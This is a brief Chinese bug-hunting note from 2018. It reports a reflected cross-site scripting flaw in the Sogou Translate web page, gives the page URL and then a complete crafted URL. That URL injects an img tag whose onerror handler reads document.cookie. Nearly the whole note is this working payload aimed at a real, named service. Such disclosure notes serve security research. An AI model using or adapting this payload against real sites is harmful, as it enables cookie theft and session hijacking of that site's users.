@1kbfree
        
        2018-11-09T06:40:46.000000Z
        字数 195
        阅读 1253
    漏洞挖掘
1、打开Url:http://fanyi.sogou.com/?fr=websearch

2、发现可以解析html,直接构造payload:
http://fanyi.sogou.com/?fr=websearch#zh-CHS/en/123%22%3E%3Cimg%2Fsrc%3D'x'%2Fonerror%3Dalert(document.cookie)%3E

